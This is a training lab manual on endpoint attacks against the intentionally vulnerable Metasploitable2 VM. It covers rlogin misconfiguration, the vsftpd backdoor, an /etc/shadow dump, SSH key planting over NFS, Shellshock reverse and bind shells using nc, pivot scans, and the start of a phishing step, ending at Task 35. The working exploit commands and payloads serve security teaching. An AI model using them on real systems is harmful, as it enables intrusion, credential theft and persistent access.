10.

16 Understanding Common Endpoint Attacks

Explore Endpoint Attacks

You will perform several ethical hacking experiments as you work through this lab exercise. The focus is on
attacking endpoints. While there will be several specific attacks that you will perform, don't concentrate on the
specifics. There are enumerable specific attacks and they come and go. Instead, concentrate on the bigger
picture. Where do the vulnerabilities lie? You will see misconfigurations, back-doored software,
vulnerabilities in base operating systems, and users who are vulnerable to social engineering. Also,
concentrate on bigger concepts such as pivoting, privilege escalation, persistence, and tunneling, each of
which are leveraged in this lab exercise.

Understand that the lab environment has been made conducive to the ethical hacking scenarios that are
described. For example, this lab exercise will make use of a Linux distribution that is known as Metasploitable
2, which is an intentionally vulnerable VM. Also, security technologies are not fully deployed. In later lab
exercises, you will see how various network security and endpoint security technologies can be used to thwart
the techniques that are demonstrated in this lab exercise.

Perform Reconnaissance
In the first half of this lab exercise, you will use the Metasploitable2 VM to demonstrate several potential
attack vectors.. Metasploitable2 is an intentionally vulnerable Linux virtual machine. It has been deployed on
the DMZ with the hostname SploitMe.abc.public. To demonstrate this fully, the ABC-ASA firewall has been
configured to allow complete connectivity between the SploitMe host, and both the inside and external
networks.

Network attacks generally start with some reconnaissance. Reconnaissance is used throughout attack
campaigns. As one host is compromised, it can be used as a pivot, and reconnaissance can be performed to
reach deeper into the victim’s network. Assume that some footprinting exercises have been done and you
know that there is a host that is named sploitme.abc.public that is Internet-facing. In this section of the lab
exercise, you will perform an nmap scan against the SploitMe host.

Task 1
Access the desktop of Outside-Kali. Open a Terminal Window on Outside-Kali.
Task 2
Execute an nmap scan with the –sV option against the sploitme.abc.public host from the Outside Kali
terminal window. The nmap –sV option probes for open ports to determine the service and version
information. Be patient because this scan generally takes a little over 2 minutes to complete.

Answer
root@Outside-Kali:~# nmap -sV sploitme.abc.public

Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-27 07:32 PDT

Nmap scan report for sploitme.abc.public (192.0.2.15)
Host is up (0.0023s latency).
rDNS record for 192.0.2.15: SploitMe.abc.public
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Cisco PIX sanitized smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please
submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1524-TCP:V=7.01%I=7%D=10/4%Time=57F420AA%P=x86_64-pc-linux-gnu%r(NU
<…Fingerprint data omitted…>
Service Info: Hosts: localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; Device:
firewall; CPE: cpe:/o:linux:linux_kernel, cpe:/o:cisco:pix_firewall_software
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.79 seconds

Note the following:

 The SploitMe host has 23 open services.

 Several of these services have vulnerabilities that can be exploited in different ways. You will leverage
vulnerabilities in the highlighted services as you work through this lab exercise.
 One of the services (TCP Port 1524) is unrecognized despite returning data. Therefore, towards the
end of the nmap output, nmap prompts you for the service/version, to submit the fingerprint of that
service to https://nmap.org/cgi-bin/submit.cgi?new-service. Part of that output was omitted from this
step's output example.

Exploit a Misconfiguration
Misconfigurations, bad decisions in configuration (valuing convenience over security), and using default
configurations (including credentials) are all too common. As the appreciation for security grows, these types
of vulnerabilities occur less often, but they certainly do occur. This lab task leverages a poorly configured
rlogin service, which provides admin convenience at the expense of security.

As you learned in the TCP/IP Attacks section, the Berkley r-utilities is a set of Unix/Linux tools that feature
remote login (rlogin), remote copying (rcp), and remote command execution (rsh). These commands were
developed for password-free access to Unix/Linux machines. Although the r-utilities have some advantages,
they should be avoided because they can make access to the host extremely insecure, and transmissions using
the r-utilities are not encrypted.
In the previous task, you saw that the TCP port 513 login service is an open port on the sploitme.abc.public
host. Note that the open TCP 512 port is for the exec service (remote process execution), and the open TCP
514 port is for the shell service (remote shell).

Task 3
Access the desktop of Outside-Kali and open a terminal window.
Task 4
Execute the rlogin command from the Outside-Kali terminal window to remotely log in to the
sploitme.abc.public host in the DMZ.

Answer

root@Outside-Kali:~# rlogin sploitme.abc.public

Last login: Tue Sep 27 12:55:12 EDT 2016 from 209.165.200.235 on pts/1
Linux SploitMe 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@SploitMe:~#

Note the following:

 The prompt changed from root@Outside-Kali to root@SploitMe, indicating that you have a
successful remote console to the SploitMe host—without requiring you to enter any user credentials.

Task 5
Execute the whoami command to determine which user you are logged is as on the sploitme.abc.public host.

Answer

root@SploitMe:~# whoami
root
root@SploitMe:~#

Note the following:

 You should see that you got logged in as the root user.
 By default, rlogin will log in to the remote host with the account which is the same as the local host
account. Because you were logged in to the Outside-Kali host as the root user, you were able to
rlogin to the remote host also as the root user, simply by using the rlogin sploitme.abc.public
command. If you logged in as any other user name, you would have to specify root as the user with
the –l rlogin option (rlogin -l root sploitme.abc.public).
 With root access, you can perform root privileged activities on the exploited sploitme.abc.public host.

In the past, the use of r-utilities was more common, but now r-utilities are rarely used because of security
concerns. If the r-utilities is running on the host, the .rhosts files specify which remote users can access the r-
utilities (such as rsh, rcp, and rlogin) on the local system without a password. The .rhosts file is in a
specific user’s (including root) home directory. If the r-utilities are not running on the host, then it doesn't
matter if the .rhosts files exist. In this lab exercise, the SploitMe host has the rsh-client package installed and
running for this rlogin exploit demonstration.

Task 6
Examine the content of the .rhosts file. Execute the ls -a command to verify that the .rhosts file is there,
then use the cat .rhosts command to examine the .rhosts file content.

Answer

root@SploitMe:~# ls -a
. .config .gconf .profile .ssh
.. Desktop .gconfd .purple .vnc
.bash_history .filezilla .gstreamer-0.10 reset_logs.sh vnc.log
.bashrc .fluxbox .mozilla .rhosts .Xauthority

root@SploitMe:~# cat .rhosts

+ +
In the SploitMe .rhosts file, you should see that a plus sign (+) was entered in the remote-host and user fields,
allowing any user from any host to log in to the local host.Below is another example of the .rhost file where
only the secops user from the example1.com and example2.com hosts is allowed access.
example1.com secops
example2.com secops

Note the following:

 There are plenty of other things that can be performed as the root user, but this task is just enough to
demonstrate a simple exploit against rlogin and the .rhost + + misconfiguration.

Task 7
Exit the rlogin session to the sploitme.abc.public host to return to the Outside-Kali shell.

Answer

root@SploitMe:~# exit
logout
rlogin: connection closed.
root@Outside-Kali:~#

Was getting root access to a remote host too easy? In a way, yes. Metasploitable 2 is an intentionally
vulnerable Linux virtual machine. Metasploitable2 can be used to conduct security training, test security tools,
and practice common penetration testing techniques.

The r-utilities has fallen out of favor, and SSH is now preferred. The .rhosts + + is a classic misconfiguration.
Before security consciousness evolved in TCP/IP networking, it was a common configuration, but you
shouldn't expect to see it in modern times. The focus is not this particular exploit—understand that
misconfigurations are still a common source of vulnerability. An inexperienced system administrator may
leave insecure default settings in place. Experienced system administrators will also make mistakes. Human
nature seeks convenience, and convenience is often at odds with security.

Note

For more information and to download the Metasploitable2 VM, refer to

https://community.rapid7.com/docs/DOC-1875.

Exploit a Back Door

Binary images can be hacked and the software distribution channels can also be hacked. To protect against
such hacks, the U.S. government introduced the Federal Information Processing Standard (FIPS) 140. The
FIPS-140 standard went into effect in 2011. To be FIPS-140 compliant, software must be digitally signed and
be verified for authenticity and integrity prior to load and execution. Digitally signed software offers increased
protection from the installation and loading of software that has been corrupted, modified, or hacked. For
example, Cisco IOS software images are digitally signed.

An example of a software being hacked was the vsftpd-2.3.4.gz archive in the official distribution download
back in 2011. vsftpd, which stands for "Very Secure FTP Daemon" is an FTP server for Unix-like systems,
including Linux. The tampered vsftpd software was only posted for a few days, but anyone who downloaded
this hacked vsftpd software in that time period would unknowingly have the vsftpd software with the back
door. This vsftpd back door was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and
July 1st 2011, and was removed on July 3rd 2011.

A back door is a means of access to a system that bypasses security mechanisms. The system designer may
sometimes install a back door so that the system can be accessed for troubleshooting or other purposes.
However, threat actors often use back doors that they detect or install themselves to gain unauthorized system
access.

In this section of the lab exercise, you will leverage the vsftpd back door. This vsftpd back door on TCP port
6200 is activated by a log in to the ftpd service, and ending the username with smiley face (:)).

Task 8
Access the desktop of Outside-Kali. Open a terminal window on Outside-Kali.
Task 9
Execute the ftp sploitme.abc.public command from the Outside-Kali terminal Window to FTP into the
sploitme.abc.public host in the DMZ. Enter user:) as the username, and simply press Enter for the
password.

Answer

Note: After entering the user:) username and pressing Enter for the password, you might think that the
terminal window is locked up. Don't worry! Simply open a second terminal window on the Outside Kali host
to continue to the next step.
root@Outside-Kali:~#
root@Outside-Kali:~# ftp sploitme.abc.public
Connected to sploitme.abc.public.
220 (vsFTPd 2.3.4)
Name (sploitme.abc.public:root): user:)
331 Please specify the password.
Password:

Task 10
Now, with the vsftpd back door active on the sploitme.abc.public host, use the ncat sploitme.abc.public
6200 -v command on the Outside Kali host second terminal window to remotely connect to the
sploitme.abc.public host.

Answer

The ncat option is a simple, but feature-packed, networking utility that reads and writes data across networks
from the command line. The ncat 6200 option specifies the TCP port number to connect to, and the –v
option specifies the verbose option.
 Terminal Window 2
root@Outside-Kali:~# ncat sploitme.abc.public 6200 -v
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.0.2.15:6200.
The back door does not provide a prompt like the normal bash shell, but commands are accepted and output is
displayed, as you will see in the next step.
Task 11
Execute the following commands on the remote sploitme.abc.public host from the ncat session to test the
back door connection:

1. Enter the whoami command to determine which user you are logged in to as on the SploitMe host.
2. Enter the pwd command to determine the current directory path.
3. Enter the cat /etc/shadow commands to display the hashes of the user passwords

Answer

Terminal Window 2 (with the active ncat session)

root@Outside-Kali:~# ncat sploitme.abc.public 6200 -v
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.0.2.15:6200.
whoami
root
pwd
/
cat /etc/shadow
root:$1$bYuaYjHI$W/YxAkEVouSMmZqyXc6Wm/:17057:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
<…Output Omitted…>
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::

Note the following:

 You should see that this vsftpd back door provides root access.
 The /etc/shadow command, which stores hashes of the user passwords, is only readable by users with
root privileges.

Task 12
Enter Ctrl-C on both terminal windows to terminate the ncat and ftp sessions to the SploitMe host.

Answer
 Terminal Window 2 (with the active ncat session)
root@Outside-Kali:~# ncat sploitme.abc.public 6200 -v
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.0.2.15:6200.
<output omitted>
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::

<Ctrl-C>

root@Outside-Kali:~#
Terminal Window 1 (with the active ftp session)
root@Outside-Kali:~# ftp sploitme.abc.public
Connected to sploitme.abc.public.
220 (vsFTPd 2.3.4)
Name (sploitme.abc.public:root): user:)
331 Please specify the password.
Password:

<Ctrl-C>
421 Service not available, remote server has closed connection

root@Outside-Kali:~#
Note: If you are still at an FTP prompt after using Ctrl-C, enter the exit command to terminate the FTP
client.

Was this back door access too easy? Again, yes and no. Metasploitable2 is loaded with vulnerabilities that are
easy to exploit if you know what they are and how to use them. But the ease of exploiting this vulnerability is
less important than the class of vulnerabilities. Back doors have been a common theme throughout the years.
This is not the only example of compromising the software distribution channel to get a back door released
into the wild. The idea of inserting a back door into an installable system can also be much more targeted if
particular users or groups can be tricked into downloading and installing the hacked software. Back doors are
often put into technology products by the developers. Prominent technology companies have been caught with
back doors in their products.

Escalate a Privilege Escalation

A fundamental goal of any attack is to first take what is provided, often start with lower-level privilege access,
then escalate to a higher privilege level access.

This lab task will leverage network file system (NFS) misconfiguration. The NFS protocol provides
transparent remote access to the shared file systems across the networks. The NFS protocol is designed to be
independent of the machine, the operating system, the network architecture, and the transport protocol. This
independence is achieved through the use of remote procedure call (RPC). RPC is a protocol that one program
can use to request a service from a program located in another computer in a network without having to
understand the network details.

The NFS misconfiguration gives threat actors the ability to remotely place files anywhere in the file system.
For example, a threat actor can place SSH keys in the authorized key repository, then use their public key to
gain remote root SSH access.

Task 13
You will first start by performing a reconnaissance on the sploitme.abc.public host from the Outside Kali host.
Enter the rpcinfo -p sploitme.abc.public command on the Outside Kali host. The rpcinfo command
makes an RPC call to an RPC server and reports what it finds.

Answer
From the output, determine the running NFS versions, and which protocols and ports that NFS is using.
root@Outside-Kali:~# rpcinfo -p sploitme.abc.public
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 48355 status
100024 1 tcp 36644 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 41410 nlockmgr
100021 3 udp 41410 nlockmgr
100021 4 udp 41410 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 35516 nlockmgr
100021 3 tcp 35516 nlockmgr
100021 4 tcp 35516 nlockmgr
100005 1 udp 58233 mountd
100005 1 tcp 46570 mountd
100005 2 udp 58233 mountd
100005 2 tcp 46570 mountd
100005 3 udp 58233 mountd
100005 3 tcp 46570 mountd

Note the following:

 You should see that NFS versions 2, 3 and 4 are all running on both TCP and UDP port 2049.

Task 14
View the NFS export list using the showmount -e sploitme.abc.public command. The showmount
command is used to query the mount daemon on a remote host for information about the state of the NFS
server on that machine. The -e or –exports option displays the NFS server’s export list.

Answer

root@Outside-Kali:~# showmount -e sploitme.abc.public

Export list for sploitme.abc.public:
/ *

Examine the showmount output:

 The first field (/) is the directory that is being exported. In this case, the root directory (/) is being
exported.
 The second field (*) is the network that is allowed to access the exported directory. This often looks
something like 10.10.4.0/24, but in this case it is *. The asterisk (*) means the any of the networks can
access the exported directory.

Note the following:

 In this example, the NFS export list was intentionally misconfigured to allow any networks access to
the root directory.
 A more typical restrictive NFS export list may look more like the following:

Export list for example.com:

/abc/volume1 10.10.10.10/32
/xyz/volume1 10.10.10.20/32

etc…..
Next, you will create an RSA key pair. Afterwards, you will place it onto the SploitMe host. The RSA key
pair that is saved on the SploitMe host will then be used to authenticate the remote SSH access to the
SploitMe host.

Task 15
From the Outside Kali host, you will first use the ssh-keygen command to create an RSA key pair. For this
demo, just pressing Enter on your keyboard when prompted for the filename and passphrase is fine. By
default, the generated RSA public key will be saved in the /root/.ssh/id_rsa.pub file on the Outside Kali host.

Answer

root@Outside-Kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f7:56:07:73:4f:db:1c:e3:5c:18:4b:fd:37:95:30:64 root@Outside-Kali
The key's randomart image is:
+---[RSA 2048]----+
| .E+..|
| ...=o|
| =o*|
| oBX|
| S . .+B|
| . . . . |
| o |
| . |
| |
+-----------------+

Note the following:

 An SSH server can authenticate clients using various methods. One of the most common methods is
RSA key authentication. To enable RSA key authentication, the client’s public key is stored on the
SSH server. The public key must be added to the .ssh/authorized_keys file within the remote user's
home directory. When the client attempts to connect to the SSH server, the SSH server verifies if the
client has a private key that corresponds with one of the authorized public keys. If the private key is
verified to match an authorized public key, the client is authenticated and a Shell session is launched.
 Now you have a public private key pair that will be used for the SSH authentication. In the next few
steps, you will mount the NFS file share, and put your public key in the authorized key's list for the
root user on the SploitMe host.

Task 16
Mount the NFS remote file share from the SploitMe host to the Outside Kali host. Begin by creating a
directory to use as the mount point. Use the mkdir sploitme command to create the sploitme directory in
which to place the NFS remote file share.

Answer

root@Outside-Kali:~# mkdir sploitme

Task 17
Use the mount -t nfs -o nolock sploitme.abc.public:/ sploitme command to mount the NFS
remote file share from the SploitMe host.

Answer
root@Outside-Kali:~# mount -t nfs -o nolock sploitme.abc.public:/ sploitme
Task 18
Use the ls sploitme command to examine the content of the sploitme NFS mount.

Answer

root@Outside-Kali:~# ls sploitme
bin dev initrd lost+found nohup.out root sys var
boot etc initrd.img media opt sbin tmp vmlinuz
cdrom home lib mnt proc srv usr

Note the following:

 The ls for the sploitme mount point is showing the root directory of the SploitMe host.

Task 19
Finally, use the cat ~/.ssh/id_rsa.pub >> sploitme/root/.ssh/authorized_keys command to copy
the RSA public key file to the /root/.ssh/authorized_keys file in the sploitme NFS mount. This command is a
bit tedious to type, so you can copy and paste it from the AttackingEndpoints.txt file in the SECFND folder
on the DVD drive (Cyber).

Answer

root@Outside-Kali:~# cat ~/.ssh/id_rsa.pub >> sploitme/root/.ssh/authorized_keys

Note the following:

 cat displays the contents of the ~/.ssh/id_rsa.pub file, and then >> redirects the output, appending it to
the end of sploitme/root/.ssh/authorized_keys (which is /root/.ssh/authorized_keys on the SploitMe
host). You now have your public key on the SploitMe host authorized key list!

Task 20
Execute the umount sploitme command to unmount the sploitme NFS mount on the Outside Kali host.

Answer

root@Outside-Kali:~# umount sploitme

After the unmount, use the ls command to display the contents of the sploitme directory again. The directory
should be empty.
root@Outside-Kali:~# ls sploitme
root@Outside-Kali:~#

Note the following:

 Now that you have successfully placed your RSA public key in the SploitMe host authorized key list,
in the next step, you will SSH to the SploitMe host as the root user.

Task 21
From the Outside Kali host, use the ssh sploitme.abc.public command to SSH to the SploitMe host. Then
use the whoami command to verify that you are logged in as the root user on the SploitMe host.

Answer
root@Outside-Kali:~# ssh sploitme.abc.public
The authenticity of host 'sploitme.abc.public (192.0.2.15)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'sploitme.abc.public,192.0.2.15' (RSA) to the list of known
hosts.
Last login: Tue Sep 27 13:21:11 2016 from 209.165.200.235
Linux SploitMe 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/
You have new mail.

root@SploitMe:~# whoami
root

Note the following:

 You SSH to the SploitMe host as the root user because you are root on the Outside Kali host. If you
did not log in as the root user on the Outside Kali host, you would have to use ssh
root@sploitme.abc.public to SSH in as the root user.

Task 22
Exit out of the SSH session to the SploitMe host.

Answer

root@SploitMe:~# exit
logout
Connection to sploitme.abc.public closed.
root@Outside-Kali:~#

Again, there was a terrible NFS misconfiguration which makes this exploit all too simple. But bigger concepts
are being demonstrated here. You first started with remote NFS file share access, and then you turned that into
SSH root access, which is an example of privilege escalation. You also have persistent access (meaning you
can still SSH to the SploitMe host, even if the SploitMe host is restarted), since your public key is stored in
the /root/.ssh/authorized_keys file. Persistence access is often the goal of a threat actor.

Exploit an Operating System Flaw

Vulnerabilities in software may take years to uncover. The Bash vulnerability Shell Shock is a great example.
The vulnerability was made public in 2014. Analysis of the source code history shows that the vulnerability
existed in version 1.03 of Bash. This version was released in 1989! The vulnerability existed for 25 years
before it was publicly documented! Bash is a Unix shell and command language.

Shell shock is a vulnerability in which the secret string, () { :; };, is used to inject a bash shell command within
something that is being parsed by bash. If a web server uses bash scripts to produce web page content, then
the secret string can be incorporated into an HTTP header along with a command allowing remote execution
of arbitrary code. This is an example of a command injection attack.

This lab task will take advantage of the Shell Shock vulnerability on the SploitMe host to open a reverse shell
connection to the Outside Kali host that is listening on the back door port.
Task 23
From the Outside Kali host, open Iceweasle (the web browser) and browse to http://sploitme.abc.public.

Answer

In the next step, you will perform a reverse shell connection from the SploitMe host (the exploited victim) to
the Outside Kali host (the attacker). For example, a reverse shell is used if a firewall is between the attacker
and the victim, and the firewall does not allow inbound connections from the attacker to the victim, which is
not the case in this lab scenario.

Task 24

From the Outside Kali host, open a terminal window, and enter the nc –lvp 9876 command to listen for incoming
connections on TCP port 9876. The nc -l option specifies that nc should listen for an incoming connection rather
than initiate a connection to a remote host. The nc –v option specifies a more verbose output. The nc –p option
specifies the source port.

Answer

The nc (or netcat) utility can be used to open TCP connections, send UDP packets, listen on arbitrary TCP and UDP
ports, do port scanning, and so on.

Terminal Window 1

root@Outside-Kali:~# nc -lvp 9876

listening on [any] 9876 ...
Task 25

From the Outside Kali host, open a second terminal window, and enter the curl -k -H 'X: () { :;};
/bin/bash -c "nc -e /bin/bash 209.165.200.235 9876"' http://sploitme.abc.public/cgi-
bin/sstest.sh command. This command is a bit tedious to type, so you can copy and paste it from the
AttackingEndpoints.txt file in the SECFND folder on the DVD drive (Cyber). The curl command is used to send a
request to the SploitMe remote server. The nc –e option specifies the file to execute after the connection.

Terminal Window 2

root@Outside-Kali:~# curl -k -H 'X: () { :;}; /bin/bash -c "nc -e /bin/bash

209.165.200.235 9876"' http://sploitme.abc.public/cgi-bin/sstest.sh

The command that is being injected is nc -e /bin/bash 209.165.200.235 9876. netcat is executing
/bin/bash (so that there is a Shell to interact with), and then connecting to the Outside-Kali host
(209.165.200.235) on TCP port 9876.

The first terminal window that was set up as a listener waiting for this connection should show a connection to
209.165.200.235 (Outside Kali host) from the SploitMe host (192.0.2.15 is the NAT translated public IP
address of the SploitMe host).

This demonstrates a reverse shell connection from the exploited SploitMe host back to the Outside Kali host
(in this case, the Outside Kali host represent the attacker’s host).

Task 26

Go back to the first terminal window. You should see that a reverse shell connection spawned as shown below. From
the reverse shell connection, execute the whoami and pwd commands. You should see that the commands are
executed against the SploitMe host.

root@Outside-Kali:~# nc -lvp 9876

listening on [any] 9876 ...
connect to [209.165.200.235] from SploitMe.abc.public [192.0.2.15] 55086

whoami
www-data

pwd
/usr/lib/cgi-bin
Task 27

Exit the nc session.

Answer

exit
root@Outside-Kali:~#
Curl will also be terminated after you terminated the nc session.
root@Outside-Kali:~# curl -k -H 'X: () { :;}; /bin/bash -c "nc -e /bin/bash
209.165.200.235 9876"' http://sploitme.abc.public/cgi-bin/sstest.sh
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at sploitme.abc.public Port 80</address>
</body></html>
root@Outside-Kali:~#

You should have successfully used the Shellshock exploit on the SploitMe host to start a reverse Shell connection to
the Outside Kali host.

In the next step, you will perform a Shell connection in the other direction, from the Outside Kali host
(attacker) to the SploitMe host (the exploited victim).

Task 28

From the Outside Kali host, use one window terminal to enter the curl -k -H 'X: () { :;}; /bin/bash -c
"nc -e /bin/bash -lvp 9876"' http://sploitme.abc.public/cgi-bin/sstest.sh command. This will
cause the SploitMe host to execute nc -e /bin/bash -lvp 9876, which is the netcat command that is providing
a bash shell and listening on for incoming connections on TCP port 9876. You can copy and paste the long command
string from the AttackingEndpoints.txt file in the SECFND folder on the DVD drive (Cyber).

Answer

Terminal Window 1

root@Outside-Kali:~# curl -k -H 'X: () { :;}; /bin/bash -c "nc -e /bin/bash -lvp 9876"'

http://sploitme.abc.public/cgi-bin/sstest.sh
Task 29

From the Outside Kali host second terminal window, enter the nc sploitme.abc.public 9876 command to start
a Shell connections to the SploitMe host on TCP port 9876. The Shell connection should be successful.

Task 30

From the Shell connection, execute the whoami and pwd commands. You should see that the commands are executed
against the SploitMe host.

Answer
 Terminal Window 2

root@Outside-Kali:~# nc sploitme.abc.public 9876

whoami
www-data

pwd
/usr/lib/cgi-bin
Task 31

Exit the nc session. This will also terminate the curl in the first terminal window.

Answer

exit

root@Outside-Kali:~#

This is a simple example of exploiting an operating system flaw. Although the Bash vulnerability Shell Shock
has long been patched up, similar operating system flaws are constantly being exploited by threat actors.
Security analysts should be aware of all the operating system flaws that are being discovered and patch them
immediately as updates become available.

Use a Pivot
Pivoting is a central concept in network attacks. If a threat actor is on host A and wants to reach host C, but
defenses prevent host A from accessing host C, then a pivot may be useful. If there is a host B that is
accessible to host A and, in turn, has access to host C, it is a potential pivot point. If the threat actor on host A
can compromise host B, then the threat actor can pivot from host B to reach host C.

This section of the lab exercise will demonstrate this pivoting concept. Using the previously exploited
SploitMe host, you will pivot from the Outside Kali host to the SploitMe host, then from the SploitMe host, to
perform reconnaissance on the inside hosts.

Task 32

The most convenient exploit that you already have in place to use for this lab task is the SSH root access to the
SploitMe host. From the Outside Kali host, SSH to the SploitMe Host.

Answer

root@Outside-Kali:~# ssh sploitme.abc.public

Last login: Tue Sep 27 15:16:36 2016 from 209.165.200.235
Linux SploitMe 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/
You have new mail.

root@SploitMe:~#
Task 33
Use the nmap –sP command to find the active hosts on the inside subnets. You could scan the entire 10.0.0.0/8
network, but it would take a very long time. For convenience, scan just the 10.10.3.0/24 and 10.10.4.0/24 inside
subnets. The nmap –sP option pings the given IP address range to check if the hosts are alive. This scan may take a
couple minutes to complete. You should see the hosts on both inside subnets being discovered.

Answer

root@SploitMe:~# nmap –sP 10.10.3.0/24 10.10.4.0/24

Starting Nmap 4.53 ( http://insecure.org ) at 2016-09-29 14:17 EDT

Host 10.10.3.1 appears to be up.
Host 10.10.3.10 appears to be up.
Host 10.10.3.41 appears to be up.
Host 10.10.4.1 appears to be up.
Host 10.10.4.20 appears to be up.
Nmap done: 512 IP addresses (5 hosts up) scanned in 103.191 seconds
Task 34

Use the nmap –O 10.10.3.1 command to scan 10.10.3.1. The nmap –O option enables operating system detection.
You should see that the result of the nmap scan shows the open ports on 10.10.3.1, and that 10.10.3.1 is probably a
Cisco Catalyst switch with the guessed IOS version.

Answer

root@SploitMe:~# nmap –O 10.10.3.1

Starting Nmap 4.53 ( http://insecure.org ) at 2016-09-29 14:29 EDT

Interesting ports on 10.10.3.1:
Not shown: 1712 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
Device type: switch|router
Running (JUST GUESSING) : Cisco IOS 12.X|12.2 (91%), Cisco embedded (86%)
Aggressive OS guesses: Cisco Catalyst 2960 switch (91%), Cisco 2821 router (89%), Cisco
C3500XL switch (IOS 12.0(5)) (88%), Cisco 3750 switch (IOS 12.2) (87%), Cisco Catalyst
1900 Switch, Software v9.00.03 (86%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at

http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.341 seconds

Pivoting is a unique technique for using an instance (also referred to as a "foothold") to “move” around the
network. Using the first compromised host allows and aids in the compromise of other systems that would
otherwise be inaccessible. This section of the lab exercise demonstrated a simple pivot from the Outside Kali
host to the SploitMe host by using a vulnerability on the SploitMe host which we exploited in the earlier lab
task. By pivoting to the SploitMe host, you were able to use the nmap command to discover the inside hosts.

Employ Social Engineering/Phishing

A common way of attacking a host is to attack the user on the host. Client side attacks can be the most
effective method for gaining entry into protected networks. Often the networks have defenses which prevent
connections to originate to internal systems from the Internet. On the other hand, network defenses are often
quite permissive on allowing connections from the inside to systems on the Internet.

Phishing is a social engineering technique which takes different forms. One simple form is to send an email
with a malicious attachment. If the user can be tricked into opening the malicious attachment, a malicious
process can be introduced on their internal system, which can then connect the internal system to the external
threat actor.

In this section of the lab exercise, you will send a phishing email. You will source the email from the outside,
but you will make it seem to be coming from a peer internal user. When this attachment is opened, it will
launch a reverse TCP connection back to a system under the threat actor's control.

We have already prepared a malicious file attachment that, on a Windows system, will open a reverse TCP
connection back to the Outside Kali host, destination port 4444.

Task 35

From the Outside Kali host, use the file explorer to navigate to the SECFND directory on the DVD drive. Drag and drop
the reverseSh-235.exe file to the desktop. Then right-click and rename the file x.exe.

